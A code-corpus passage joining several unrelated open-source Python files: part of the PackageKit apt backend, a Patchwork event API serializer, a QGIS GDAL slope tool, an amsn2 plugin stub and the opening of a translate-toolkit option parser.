pklog.debug("Changes: Install %s, Remove %s, Unauthenticated "
"%s" % (install, remove, unauthenticated))
if len(remove) > 0:
raise PKError(enums.ERROR_DEP_RESOLUTION_FAILED,
"Remove the following packages "
"before: %s" % remove)
if (deb.compare_to_version_in_cache() ==
apt.debfile.DebPackage.VERSION_OUTDATED):
self.message(enums.MESSAGE_NEWER_PACKAGE_EXISTS,
"There is a later version of %s "
"available in the repositories." % deb.pkgname)
if self._cache.get_changes():
self._check_trusted(only_trusted)
self._commit_changes(fetch_start=10, fetch_end=25,
install_start=25, install_end=50)
# Install the Debian package files
progress = PackageKitDpkgInstallProgress(self, start=50, end=90)
try:
progress.start_update()
progress.install(inst_files)
progress.finish_update()
except PKError as error:
self._recover()
raise error
except Exception as error:
self._recover()
raise PKError(enums.ERROR_INTERNAL_ERROR, format_string(str(error)))
self.percentage(100)
@catch_pkerror
def simulate_install_files(self, inst_files):
"""Emit the change required for the installation of the given package
files.
"""
pklog.info("Simulating installation of the package files: "
"%s" % inst_files)
self.status(enums.STATUS_DEP_RESOLVE)
self.allow_cancel(True)
self.percentage(None)
self._check_init(progress=False)
pkgs = []
for path in inst_files:
deb = apt.debfile.DebPackage(path, self._cache)
pkgs.append(deb.pkgname)
if not deb.check():
raise PKError(enums.ERROR_LOCAL_INSTALL_FAILED,
format_string(deb._failure_string))
self._emit_changes(pkgs)
@catch_pkerror
@lock_cache
def refresh_cache(self, force):
"""Update the package cache."""
# TODO: use force ?
pklog.info("Refresh cache")
self.status(enums.STATUS_REFRESH_CACHE)
self.last_action_time = time.time()
self.allow_cancel(False);
self.percentage(0)
self._check_init()
progress = PackageKitAcquireRepoProgress(self, start=10, end=95)
try:
ret = self._cache.update(progress)
except Exception as error:
# FIXME: Unluckily python-apt doesn't provide a real good error
# reporting. We only receive a failure string.
# FIXME: Doesn't detect if all downloads failed - bug in python-apt
self.message(enums.MESSAGE_REPO_METADATA_DOWNLOAD_FAILED,
format_string(str(error)))
self._open_cache(start=95, end=100)
self.percentage(100)
@catch_pkerror
def get_packages(self, filters):
"""Get packages."""
pklog.info("Get all packages")
self.status(enums.STATUS_QUERY)
self.percentage(None)
self._check_init(progress=False)
self.allow_cancel(True)
total = len(self._cache)
for count, pkg in enumerate(self._cache):
self.percentage(count / 100 * total)
if self._is_package_visible(pkg, filters):
self._emit_package(pkg)
@catch_pkerror
def resolve(self, filters, names):
"""
Implement the apt2-resolve functionality
"""
pklog.info("Resolve")
self.status(enums.STATUS_QUERY)
self.percentage(None)
self._check_init(progress=False)
self.allow_cancel(False)
for name in names:
try:
self._emit_visible_package(filters, self._cache[name])
except KeyError:
raise PKError(enums.ERROR_PACKAGE_NOT_FOUND,
"Package name %s could not be resolved" % name)
@catch_pkerror
def get_depends(self, filters, ids, recursive):
"""Emit all dependencies of the given package ids.
Doesn't support recursive dependency resolution.
"""
def emit_blocked_dependency(base_dependency, pkg=None,
filters=[]):
"""Send a blocked package signal for the given
apt.package.BaseDependency.
"""
if enums.FILTER_INSTALLED in filters:
return
if pkg:
summary = pkg.summary
try:
filters.remove(enums.FILTER_NOT_INSTALLED)
except ValueError:
pass
if not self._is_package_visible(pkg, filters):
return
else:
summary = ""
if base_dependency.relation:
version = "%s%s" % (base_dependency.relation,
base_dependency.version)
else:
version = base_dependency.version
self.package("%s;%s;;" % (base_dependency.name, version),
enums.INFO_BLOCKED, summary)
def check_dependency(pkg, base_dep):
"""Check if the given apt.package.Package can satisfy the
BaseDepenendcy and emit the corresponding package signals.
"""
if not self._is_package_visible(pkg, filters):
return
if base_dep.version:
satisfied = False
# Sort the version list to check the installed
# and candidate before the other ones
ver_list = list(pkg.versions)
if pkg.installed:
ver_list.remove(pkg.installed)
ver_list.insert(0, pkg.installed)
if pkg.candidate:
ver_list.remove(pkg.candidate)
ver_list.insert(0, pkg.candidate)
for dep_ver in ver_list:
if apt_pkg.check_dep(dep_ver.version,
base_dep.relation,
base_dep.version):
self._emit_pkg_version(dep_ver)
satisfied = True
break
if not satisfied:
emit_blocked_dependency(base_dep, pkg, filters)
else:
self._emit_package(pkg)
# Setup the transaction
pklog.info("Get depends (%s,%s,%s)" % (filter, ids, recursive))
self.status(enums.STATUS_QUERY)
self.percentage(None)
self._check_init(progress=False)
self.allow_cancel(True)
dependency_types = ["PreDepends", "Depends"]
if apt_pkg.config["APT::Install-Recommends"]:
dependency_types.append("Recommends")
total = len(ids)
for count, id in enumerate(ids):
self.percentage(count / 100 * total)
version = self._get_version_by_id(id)
for dependency in version.get_dependencies(*dependency_types):
# Walk through all or_dependencies
for base_dep in dependency.or_dependencies:
if self._cache.is_virtual_package(base_dep.name):
# Check each proivider of a virtual package
for provider in \
self._cache.get_providing_packages(base_dep.name):
check_dependency(provider, base_dep)
elif base_dep.name in self._cache:
check_dependency(self._cache[base_dep.name], base_dep)
else:
# The dependency does not exist
emit_blocked_dependency(base_dep, filters=filters)
@catch_pkerror
def get_requires(self, filters, ids, recursive):
"""Emit all packages which depend on the given ids.
Recursive searching is not supported.
"""
pklog.info("Get requires (%s,%s,%s)" % (filter, ids, recursive))
self.status(enums.STATUS_DEP_RESOLVE)
self.percentage(None)
self._check_init(progress=False)
self.allow_cancel(True)
total = len(ids)
for count, id in enumerate(ids):
self.percentage(count / 100 * total)
version = self._get_version_by_id(id)
for pkg in self._cache:
if not self._is_package_visible(pkg, filters):
continue
if pkg.is_installed:
pkg_ver = pkg.installed
elif pkg.candidate:
pkg_ver = pkg.candidate
for dependency in pkg_ver.dependencies:
satisfied = False
for base_dep in dependency.or_dependencies:
if version.package.name == base_dep.name or \
base_dep.name in version.provides:
satisfied = True
break
if satisfied:
self._emit_package(pkg)
break
@catch_pkerror
def what_provides(self, filters, provides_type, search):
def get_mapping_db(path):
"""
Return the gdbm database at the given path or send an
appropriate error message
"""
if not os.access(path, os.R_OK):
pklog.warning("list of applications that can handle files of the given type %s does not exist")
return None
try:
db = gdbm.open(path)
except:
raise PKError(enums.ERROR_INTERNAL_ERROR,
"The list of applications that can handle "
"files of the given type cannot be opened.\n"
"Try to reinstall the package "
"app-install-data.")
else:
return db
def extract_gstreamer_request(search):
# The search term from PackageKit daemon:
# gstreamer0.10(urisource-foobar)
# gstreamer0.10(decoder-audio/x-wma)(wmaversion=3)
match = re.match("^gstreamer(?P<version>[0-9\.]+)"
"\((?P<kind>.+?)-(?P<data>.+?)\)"
"(\((?P<opt>.*)\))?",
search)
caps = None
if not match:
raise PKError(enums.ERROR_NOT_SUPPORTED,
"The search term is invalid: %s" % search)
if match.group("opt"):
caps_str = "%s, %s" % (match.group("data"), match.group("opt"))
# gst.Caps.__init__ cannot handle unicode instances
caps = gst.Caps(str(caps_str))
record = GSTREAMER_RECORD_MAP[match.group("kind")]
return match.group("version"), record, match.group("data"), caps
self.status(enums.STATUS_QUERY)
self.percentage(None)
self._check_init(progress=False)
self.allow_cancel(False)
supported_type = False
if provides_type in (enums.PROVIDES_CODEC, enums.PROVIDES_ANY):
supported_type = True
# Search for privided gstreamer plugins using the package
# metadata
import gst
GSTREAMER_RECORD_MAP = {"encoder": "Gstreamer-Encoders",
"decoder": "Gstreamer-Decoders",
"urisource": "Gstreamer-Uri-Sources",
"urisink": "Gstreamer-Uri-Sinks",
"element": "Gstreamer-Elements"}
for search_item in search:
try:
gst_version, gst_record, gst_data, gst_caps = \
extract_gstreamer_request(search_item)
except PKError:
if provides_type == enums.PROVIDES_ANY:
break # ignore invalid codec query, probably for other types
else:
raise
for pkg in self._cache:
if pkg.installed:
version = pkg.installed
elif pkg.candidate:
version = pkg.candidate
else:
continue
if not "Gstreamer-Version" in version.record:
continue
if version.record["Gstreamer-Version"] != gst_version:
continue
if gst_caps:
try:
pkg_caps = gst.Caps(version.record[gst_record])
except KeyError:
continue
if gst_caps.intersect(pkg_caps):
self._emit_visible_package(filters, pkg)
else:
try:
elements = version.record[gst_record]
except KeyError:
continue
if gst_data in elements:
self._emit_visible_package(filters, pkg)
if provides_type in (enums.PROVIDES_MIMETYPE, enums.PROVIDES_ANY):
supported_type = True
# Emit packages that contain an application that can handle
# the given mime type
for search_item in search:
handlers = set()
db = get_mapping_db("/var/lib/PackageKit/mime-map.gdbm")
if db == None:
if provides_type != enums.PROVIDES_ANY:
raise PKError(enums.ERROR_INTERNAL_ERROR,
"The list of applications that can handle "
"files of the given type cannot be opened.")
else:
break
if search_item in db:
pklog.debug("Mime type is registered: %s" % db[search_item])
# The mime type handler db stores the packages as a string
# separated by spaces. Each package has its section
# prefixed and separated by a slash
# FIXME: Should make use of the section and emit a
# RepositoryRequired signal if the package does not exist
handlers = [s.split("/")[1] for s in db[search_item].split(" ")]
self._emit_visible_packages_by_name(filters, handlers)
if provides_type in (enums.PROVIDES_MODALIAS, enums.PROVIDES_ANY):
supported_type = True
system_architecture = apt_pkg.get_architectures()[0]
# Emit packages that contain an application that can handle
# the given modalias
valid_modalias_re = re.compile('^[a-z0-9]+:')
for search_item in search:
if not valid_modalias_re.match(search_item):
if provides_type != enums.PROVIDES_ANY:
raise PKError(enums.ERROR_NOT_SUPPORTED,
"The search term is invalid: %s" % search_item)
else:
continue
for package in self._cache:
# skip foreign architectures, we usually only want native
# driver packages
if (not package.candidate or
package.candidate.architecture not in ("all",
system_architecture)):
continue
try:
m = package.candidate.record['Modaliases']
except (KeyError, AttributeError):
continue
try:
pkg_matches = False
for part in m.split(')'):
part = part.strip(', ')
if not part:
continue
module, lst = part.split('(')
for alias in lst.split(','):
alias = alias.strip()
if fnmatch.fnmatch(search_item, alias):
self._emit_visible_package(filters, package)
pkg_matches = True
break
if pkg_matches:
break
except ValueError:
pklog.warning("Package %s has invalid modalias header: %s" % (
package.name, m))
# run plugins
for plugin in self.plugins.get("what_provides", []):
pklog.debug("calling what_provides plugin %s" % str(plugin))
for search_item in search:
try:
for package in plugin(self._cache, provides_type, search_item):
self._emit_visible_package(filters, package)
supported_type = True
except NotImplementedError:
pass # keep supported_type as False
if not supported_type and provides_type != enums.PROVIDES_ANY:
raise PKError(enums.ERROR_NOT_SUPPORTED,
"This function is not implemented in this backend")
@catch_pkerror
def get_files(self, package_ids):
"""Emit the Files signal which includes the files included in a package
Apt only supports this for installed packages
"""
self.status(enums.STATUS_INFO)
total = len(package_ids)
self._check_init(progress=False)
for count, id in enumerate(package_ids):
self.percentage(count / 100 * total)
pkg = self._get_package_by_id(id)
files = ";".join(pkg.installed_files)
self.files(id, files)
# Helpers
def _init_plugins(self):
"""Initialize plugins."""
self.plugins = {} # plugin_name -> [plugin_fn1, ...]
if not pkg_resources:
return
# just look in standard Python paths for now
dists, errors = pkg_resources.working_set.find_plugins(pkg_resources.Environment())
for dist in dists:
pkg_resources.working_set.add(dist)
for plugin_name in ["what_provides"]:
for entry_point in pkg_resources.iter_entry_points(
"packagekit.apt.plugins", plugin_name):
try:
plugin = entry_point.load()
except Exception as e:
pklog.warning("Failed to load %s from plugin %s: %s" % (
plugin_name, str(entry_point.dist), str(e)))
continue
pklog.debug("Loaded %s from plugin %s" % (
plugin_name, str(entry_point.dist)))
self.plugins.setdefault(plugin_name, []).append(plugin)
def _unlock_cache(self):
"""Unlock the system package cache."""
try:
apt_pkg.pkgsystem_unlock()
except SystemError:
return False
return True
def _open_cache(self, start=0, end=100, progress=True, fail_broken=True):
"""(Re)Open the APT cache."""
pklog.debug("Open APT cache")
self.status(enums.STATUS_LOADING_CACHE)
rootdir = os.getenv("ROOT", "/")
if rootdir == "/":
rootdir = None
try:
self._cache = apt.Cache(PackageKitOpProgress(self, start, end,
progress),
rootdir=rootdir)
except Exception as error:
raise PKError(enums.ERROR_NO_CACHE,
"Package cache could not be opened:%s" % error)
if self._cache.broken_count > 0 and fail_broken:
raise PKError(enums.ERROR_DEP_RESOLUTION_FAILED,
"There are broken dependecies on your system. "
"Please use an advanced package manage e.g. "
"Synaptic or aptitude to resolve this situation.")
if rootdir:
apt_pkg.config.clear("DPkg::Post-Invoke")
apt_pkg.config.clear("DPkg::Options")
apt_pkg.config["DPkg::Options::"] = "--root=%s" % rootdir
dpkg_log = "--log=%s/var/log/dpkg.log" % rootdir
apt_pkg.config["DPkg::Options::"] = dpkg_log
self._last_cache_refresh = time.time()
def _recover(self, start=95, end=100):
"""Try to recover from a package manager failure."""
self.status(enums.STATUS_CLEANUP)
self.percentage(None)
try:
d = PackageKitDpkgInstallProgress(self)
d.start_update()
d.recover()
d.finish_update()
except:
pass
self._open_cache(start=95, end=100)
def _check_trusted(self, only_trusted):
"""Check if only trusted packages are allowed and fail if
untrusted packages would be installed in this case.
"""
untrusted = []
if only_trusted:
for pkg in self._cache:
if (pkg.marked_install or pkg.marked_upgrade or
pkg.marked_downgrade or pkg.marked_reinstall):
trusted = False
for origin in pkg.candidate.origins:
trusted |= origin.trusted
if not trusted:
untrusted.append(pkg.name)
if untrusted:
raise PKError(enums.ERROR_MISSING_GPG_SIGNATURE,
" ".join(untrusted))
def _commit_changes(self, fetch_start=10, fetch_end=50,
install_start=50, install_end=90):
"""Commit changes to the system."""
acquire_prog = PackageKitAcquireProgress(self, fetch_start, fetch_end)
inst_prog = PackageKitInstallProgress(self, install_start, install_end)
try:
self._cache.commit(acquire_prog, inst_prog)
except apt.cache.FetchFailedException as err:
if acquire_prog.media_change_required:
raise PKError(enums.ERROR_MEDIA_CHANGE_REQUIRED,
format_string(err.message))
else:
pklog.critical(format_string(err.message))
raise PKError(enums.ERROR_PACKAGE_DOWNLOAD_FAILED,
format_string(err.message))
except apt.cache.FetchCancelledException:
raise PKError(enums.TRANSACTION_CANCELLED)
except PKError as error:
self._recover()
raise error
except SystemError as error:
self._recover()
raise PKError(enums.ERROR_INTERNAL_ERROR,
format_string("%s\n%s" % (str(error),
inst_prog.output)))
def _get_id_from_version(self, version):
"""Return the package id of an apt.package.Version instance."""
if version.origins:
origin = version.origins[0].label
else:
origin = ""
id = "%s;%s;%s;%s" % (version.package.name, version.version,
version.architecture, origin)
return id
def _check_init(self, start=0, end=10, progress=True, fail_broken=True):
"""Check if the backend was initialized well and try to recover from
a broken setup.
"""
pklog.debug("Checking apt cache and xapian database")
pkg_cache = os.path.join(apt_pkg.config["Dir"],
apt_pkg.config["Dir::Cache"],
apt_pkg.config["Dir::Cache::pkgcache"])
src_cache = os.path.join(apt_pkg.config["Dir"],
apt_pkg.config["Dir::Cache"],
apt_pkg.config["Dir::Cache::srcpkgcache"])
# Check if the cache instance is of the coorect class type, contains
# any broken packages and if the dpkg status or apt cache files have
# been changed since the last refresh
if not isinstance(self._cache, apt.cache.Cache) or \
(self._cache.broken_count > 0) or \
(os.stat(apt_pkg.config["Dir::State::status"])[stat.ST_MTIME] > \
self._last_cache_refresh) or \
(os.stat(pkg_cache)[stat.ST_MTIME] > self._last_cache_refresh) or \
(os.stat(src_cache)[stat.ST_MTIME] > self._last_cache_refresh):
pklog.debug("Reloading the cache is required")
self._open_cache(start, end, progress, fail_broken)
else:
pass
# Read the pin file of Synaptic if available
self._cache._depcache.read_pinfile()
if os.path.exists(SYNAPTIC_PIN_FILE):
self._cache._depcache.read_pinfile(SYNAPTIC_PIN_FILE)
# Reset the depcache
self._cache.clear()
def _emit_package(self, pkg, info=None, force_candidate=False):
"""Send the Package signal for a given APT package."""
if (not pkg.is_installed or force_candidate) and pkg.candidate:
self._emit_pkg_version(pkg.candidate, info)
elif pkg.is_installed:
self._emit_pkg_version(pkg.installed, info)
else:
pklog.debug("Package %s hasn't got any version." % pkg.name)
def _emit_pkg_version(self, version, info=None):
"""Emit the Package signal of the given apt.package.Version."""
id = self._get_id_from_version(version)
section = version.section.split("/")[-1]
if not info:
if version == version.package.installed:
if section == "metapackages":
info = enums.INFO_COLLECTION_INSTALLED
else:
info = enums.INFO_INSTALLED
else:
if section == "metapackages":
info = enums.INFO_COLLECTION_AVAILABLE
else:
info = enums.INFO_AVAILABLE
self.package(id, info, version.summary)
def _emit_all_visible_pkg_versions(self, filters, pkg):
"""Emit all available versions of a package."""
if self._is_package_visible(pkg, filters):
if enums.FILTER_NEWEST in filters:
if pkg.candidate:
self._emit_pkg_version(pkg.candidate)
elif pkg.installed:
self._emit_pkg_version(pkg.installed)
else:
for version in pkg.versions:
self._emit_pkg_version(version)
def _emit_visible_package(self, filters, pkg, info=None):
"""Filter and emit a package."""
if self._is_package_visible(pkg, filters):
self._emit_package(pkg, info)
def _emit_visible_packages(self, filters, pkgs, info=None):
"""Filter and emit packages."""
for p in pkgs:
if self._is_package_visible(p, filters):
self._emit_package(p, info)
def _emit_visible_packages_by_name(self, filters, pkgs, info=None):
"""Find the packages with the given namens. Afterwards filter and emit
them.
"""
for name in pkgs:
pkg = self._cache[name]
if self._is_package_visible(pkg, filters):
self._emit_package(pkg, info)
def _emit_changes(self, ignore_pkgs=[]):
"""Emit all changed packages."""
for pkg in self._cache:
if pkg.name in ignore_pkgs:
continue
if pkg.marked_delete:
self._emit_package(pkg, enums.INFO_REMOVING, False)
elif pkg.marked_install:
self._emit_package(pkg, enums.INFO_INSTALLING, True)
elif pkg.marked_upgrade:
self._emit_package(pkg, enums.INFO_UPDATING, True)
elif pkg.marked_downgrade:
self._emit_package(pkg, enums.INFO_DOWNGRADING, True)
elif pkg.marked_reinstall:
self._emit_package(pkg, enums.INFO_REINSTALLING, True)
def _is_package_visible(self, pkg, filters):
"""Return True if the package should be shown in the user
interface.
"""
if filters == [enums.FILTER_NONE]:
return True
for filter in filters:
if ((filter == enums.FILTER_INSTALLED and not pkg.is_installed) or
(filter == enums.FILTER_NOT_INSTALLED and pkg.is_installed) or
(filter == enums.FILTER_SUPPORTED and not
self._is_package_supported(pkg)) or
(filter == enums.FILTER_NOT_SUPPORTED and
self._is_package_supported(pkg)) or
(filter == enums.FILTER_FREE and not
not self._is_package_free(pkg)) or
(filter == enums.FILTER_NOT_FREE and
not self._is_package_not_free(pkg)) or
(filter == enums.FILTER_GUI and
not self._has_package_gui(pkg)) or
(filter == enums.FILTER_NOT_GUI and
self._has_package_gui(pkg)) or
(filter == enums.FILTER_COLLECTIONS and not
self._is_package_collection(pkg)) or
(filter == enums.FILTER_NOT_COLLECTIONS and
self._is_package_collection(pkg)) or
(filter == enums.FILTER_DEVELOPMENT and not
self._is_package_devel(pkg)) or
(filter == enums.FILTER_NOT_DEVELOPMENT and
self._is_package_devel(pkg))):
return False
return True
def _is_package_not_free(self, pkg):
"""Return True if we can be sure that the package's license isn't any
free one
"""
#FIXME: Should check every origin
origins = pkg.candidate.origins
return (origins != None and \
((origins[0].origin == "Ubuntu" and
origins[0].component in ["multiverse", "restricted"]) or
(origins[0].origin == "Debian" and
origins[0].component in ["contrib", "non-free"])) and
origins[0].trusted == True)
def _is_package_collection(self, pkg):
"""Return True if the package is a metapackge."""
section = pkg.section.split("/")[-1]
return section == "metapackages"
def _is_package_free(self, pkg):
"""Return True if we can be sure that the package has got a free
license.
"""
#FIXME: Should check every origin
origins = pkg.candidate.origins
return (origins[0] != None and
((origins[0].origin == "Ubuntu" and
origins[0].component in ["main", "universe"]) or
(origins[0].origin == "Debian" and
origins[0].component == "main")) and
origins[0].trusted == True)
def _has_package_gui(self, pkg):
#FIXME: should go to a modified Package class
#FIXME: take application data into account. perhaps checking for
# property in the xapian database
return pkg.section.split('/')[-1].lower() in ['x11', 'gnome', 'kde']
def _is_package_devel(self, pkg):
#FIXME: should go to a modified Package class
return pkg.name.endswith("-dev") or pkg.name.endswith("-dbg") or \
pkg.section.split('/')[-1].lower() in ['devel', 'libdevel']
def _is_package_supported(self, pkg):
origins = pkg.candidate.origins
#FIXME: iterate on all origins
return (origins != None and
origins[0].origin == "Ubuntu" and
origins[0].component in ["main", "restricted"] and
origins[0].trusted == True)
def _get_pkg_version_by_id(self, id):
"""Return a package version matching the given package id or None."""
name, version, arch, data = id.split(";", 4)
try:
for pkg_ver in self._cache[name].versions:
if pkg_ver.version == version and \
pkg_ver.architecture == arch:
return pkg_ver
except KeyError:
pass
return None
def _get_package_by_id(self, id):
"""Return the apt.package.Package corresponding to the given
package id.
If the package isn't available error out.
"""
version = self._get_version_by_id(id)
return version.package
def _get_version_by_id(self, id):
"""Return the apt.package.Version corresponding to the given
package id.
If the version isn't available error out.
"""
name, version_string, arch, data = id.split(";", 4)
try:
pkg = self._cache[name]
except:
raise PKError(enums.ERROR_PACKAGE_NOT_FOUND,
"There isn't any package named %s" % name)
try:
version = pkg.versions[version_string]
except:
raise PKError(enums.ERROR_PACKAGE_NOT_FOUND,
"There isn't any verion %s of %s" % (version_string,
name))
if version.architecture != arch:
raise PKError(enums.ERROR_PACKAGE_NOT_FOUND,
"Version %s of %s isn't available for architecture "
"%s" % (pkg.name, version.version, arch))
return version
def _get_package_group(self, pkg):
"""
Return the packagekit group corresponding to the package's section
"""
section = pkg.section.split("/")[-1]
if section in SECTION_GROUP_MAP:
return SECTION_GROUP_MAP[section]
else:
pklog.debug("Unkown package section %s of %s" % (pkg.section,
pkg.name))
return enums.GROUP_UNKNOWN
def _sigquit(self, signum, frame):
self._unlock_cache()
sys.exit(1)
def main():
backend = PackageKitAptBackend()
backend.dispatcher(sys.argv[1:])
if __name__ == '__main__':
main()
# vim: ts=4 et sts=4
| coolo/packagekit | backends/apt/aptBackend.py | Python | gpl-2.0 | 99,604 |
# Patchwork - automated patch tracking system
# Copyright (C) 2017 Stephen Finucane <stephen@that.guru>
#
# SPDX-License-Identifier: GPL-2.0-or-later
from collections import OrderedDict
from rest_framework.generics import ListAPIView
from rest_framework.serializers import ModelSerializer
from rest_framework.serializers import SerializerMethodField
from patchwork.api.embedded import CheckSerializer
from patchwork.api.embedded import CoverLetterSerializer
from patchwork.api.embedded import PatchSerializer
from patchwork.api.embedded import ProjectSerializer
from patchwork.api.embedded import SeriesSerializer
from patchwork.api.embedded import UserSerializer
from patchwork.api.filters import EventFilterSet
from patchwork.api.patch import StateField
from patchwork.models import Event
class EventSerializer(ModelSerializer):
project = ProjectSerializer(read_only=True)
patch = PatchSerializer(read_only=True)
series = SeriesSerializer(read_only=True)
cover = CoverLetterSerializer(read_only=True)
previous_state = StateField()
current_state = StateField()
previous_delegate = UserSerializer()
current_delegate = UserSerializer()
created_check = SerializerMethodField()
created_check = CheckSerializer()
_category_map = {
Event.CATEGORY_COVER_CREATED: ['cover'],
Event.CATEGORY_PATCH_CREATED: ['patch'],
Event.CATEGORY_PATCH_COMPLETED: ['patch', 'series'],
Event.CATEGORY_PATCH_STATE_CHANGED: ['patch', 'previous_state',
'current_state'],
Event.CATEGORY_PATCH_DELEGATED: ['patch', 'previous_delegate',
'current_delegate'],
Event.CATEGORY_CHECK_CREATED: ['patch', 'created_check'],
Event.CATEGORY_SERIES_CREATED: ['series'],
Event.CATEGORY_SERIES_COMPLETED: ['series'],
}
def to_representation(self, instance):
data = super(EventSerializer, self).to_representation(instance)
payload = OrderedDict()
kept_fields = self._category_map[instance.category] + [
'id', 'category', 'project', 'date']
for field in [x for x in data]:
if field not in kept_fields:
del data[field]
elif field in self._category_map[instance.category]:
field_name = 'check' if field == 'created_check' else field
payload[field_name] = data.pop(field)
data['payload'] = payload
return data
class Meta:
model = Event
fields = ('id', 'category', 'project', 'date', 'patch', 'series',
'cover', 'previous_state', 'current_state',
'previous_delegate', 'current_delegate', 'created_check')
read_only_fields = fields
class EventList(ListAPIView):
"""List events."""
serializer_class = EventSerializer
filter_class = filterset_class = EventFilterSet
page_size_query_param = None # fixed page size
ordering_fields = ()
ordering = '-date'
def get_queryset(self):
return Event.objects.all()\
.prefetch_related('project', 'patch', 'series', 'cover',
'previous_state', 'current_state',
'previous_delegate', 'current_delegate',
'created_check')
| stephenfin/patchwork | patchwork/api/event.py | Python | gpl-2.0 | 3,356 |
# -*- coding: utf-8 -*-
"""
***************************************************************************
slope.py
---------------------
Date : October 2013
Copyright : (C) 2013 by Alexander Bruy
Email : alexander dot bruy at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
from builtins import str
__author__ = 'Alexander Bruy'
__date__ = 'October 2013'
__copyright__ = '(C) 2013, Alexander Bruy'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from processing.algs.gdal.GdalAlgorithm import GdalAlgorithm
from processing.core.parameters import ParameterRaster
from processing.core.parameters import ParameterBoolean
from processing.core.parameters import ParameterNumber
from processing.core.outputs import OutputRaster
from processing.algs.gdal.GdalUtils import GdalUtils
pluginPath = os.path.split(os.path.split(os.path.dirname(__file__))[0])[0]
class slope(GdalAlgorithm):
INPUT = 'INPUT'
BAND = 'BAND'
COMPUTE_EDGES = 'COMPUTE_EDGES'
ZEVENBERGEN = 'ZEVENBERGEN'
AS_PERCENT = 'AS_PERCENT'
SCALE = 'SCALE'
OUTPUT = 'OUTPUT'
def group(self):
return self.tr('Raster analysis')
def name(self):
return 'slope'
def displayName(self):
return self.tr('Slope')
def defineCharacteristics(self):
self.addParameter(ParameterRaster(self.INPUT, self.tr('Input layer')))
self.addParameter(ParameterNumber(self.BAND,
self.tr('Band number'), 1, 99, 1))
self.addParameter(ParameterBoolean(self.COMPUTE_EDGES,
self.tr('Compute edges'), False))
self.addParameter(ParameterBoolean(self.ZEVENBERGEN,
self.tr("Use Zevenbergen&Thorne formula (instead of the Horn's one)"),
False))
self.addParameter(ParameterBoolean(self.AS_PERCENT,
self.tr('Slope expressed as percent (instead of degrees)'), False))
self.addParameter(ParameterNumber(self.SCALE,
self.tr('Scale (ratio of vert. units to horiz.)'),
0.0, 99999999.999999, 1.0))
self.addOutput(OutputRaster(self.OUTPUT, self.tr('Slope')))
def getConsoleCommands(self):
arguments = ['slope']
arguments.append(str(self.getParameterValue(self.INPUT)))
output = str(self.getOutputValue(self.OUTPUT))
arguments.append(output)
arguments.append('-of')
arguments.append(GdalUtils.getFormatShortNameFromFilename(output))
arguments.append('-b')
arguments.append(str(self.getParameterValue(self.BAND)))
arguments.append('-s')
arguments.append(str(self.getParameterValue(self.SCALE)))
if self.getParameterValue(self.COMPUTE_EDGES):
arguments.append('-compute_edges')
if self.getParameterValue(self.ZEVENBERGEN):
arguments.append('-alg')
arguments.append('ZevenbergenThorne')
if self.getParameterValue(self.AS_PERCENT):
arguments.append('-p')
return ['gdaldem', GdalUtils.escapeAndJoin(arguments)]
| gioman/QGIS | python/plugins/processing/algs/gdal/slope.py | Python | gpl-2.0 | 3,918 |
# plugins module for amsn2
"""
Plugins with amsn2 will be a subclass of the aMSNPlugin() class.
When this module is initially imported it should load the plugins from the last session. Done in the init() proc.
Then the GUI should call plugins.loadPlugin(name) or plugins.unLoadPlugin(name) in order to deal with plugins.
"""
# init()
# Called when the plugins module is imported (only for the first time).
# Should find plugins and populate a list ready for getPlugins().
# Should also auto-update all plugins.
def init(): pass
# loadPlugin(plugin_name)
# Called (by the GUI or from init()) to load a plugin. plugin_name as set in plugin's XML (or from getPlugins()).
# This loads the module for the plugin. The module is then responsible for calling plugins.registerPlugin(instance).
def loadPlugin(plugin_name): pass
# unLoadPlugin(plugin_name)
# Called to unload a plugin. Name is name as set in plugin's XML.
def unLoadPlugin(plugin_name): pass
# registerPlugin(plugin_instance)
# Saves the instance of the plugin, and registers it in the loaded list.
def registerPlugin(plugin_instance): pass
# getPlugins()
# Returns a list of all available plugins, as in ['Plugin 1', 'Plugin 2']
def getPlugins(): pass
# getPluginsWithStatus()
# Returns a list with a list item for each plugin with the plugin's name, and Loaded or NotLoaded either way.
# IE: [['Plugin 1', 'Loaded'], ['Plugin 2', 'NotLoaded']]
def getPluginsWithStatus(): pass
# getLoadedPlugins()
# Returns a list of loaded plugins. as in ['Plugin 1', 'Plugin N']
def getLoadedPlugins(): pass
# findPlugin(plugin_name)
# Retruns the running instance of the plugin with name plugin_name, or None if not found.
def findPlugin(plugin_name): pass
# saveConfig(plugin_name, data)
def saveConfig(plugin_name, data): pass
# Calls the init procedure.
# Will only be called on the first import (thanks to python).
init()
| kakaroto/amsn2 | amsn2/plugins/core.py | Python | gpl-2.0 | 1,882 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2002-2006 Zuza Software Foundation
#
# This file is part of translate.
#
# translate is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# translate is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
import fnmatch
import logging
import optparse
import os.path
import re
import six
import sys
import traceback
from io import BytesIO
from translate import __version__
from translate.misc import progressbar
class ManPageOption(optparse.Option, object):
ACTIONS = optparse.Option.ACTIONS + ("manpage",)
def take_action(self, action, dest, opt, value, values, parser):
"""take_action that can handle manpage as well as standard actions"""
if action == "manpage":
parser.print_manpage()
sys.exit(0)
return super(ManPageOption, self).take_action(action, dest, opt, value,
values, parser)
class ManHelpFormatter(optparse.HelpFormatter):
def __init__(self,
indent_increment=0,
max_help_position=0,
width=80,
short_first=1):
optparse.HelpFormatter.__init__(
self, indent_increment, max_help_position, width, short_first)
def format_option_strings(self, option):
"""Return a comma-separated list of option strings & metavariables."""
if option.takes_value():
metavar = option.metavar or option.dest.upper()
metavar = '\\fI%s\\fP' % metavar
short_opts = [sopt + metavar for sopt in option._short_opts]
long_opts = [lopt + "\\fR=\\fP" + metavar for lopt in option._long_opts]
else:
short_opts = option._short_opts
long_opts = option._long_opts
if self.short_first:
opts = short_opts + long_opts
else:
opts = long_opts + short_opts
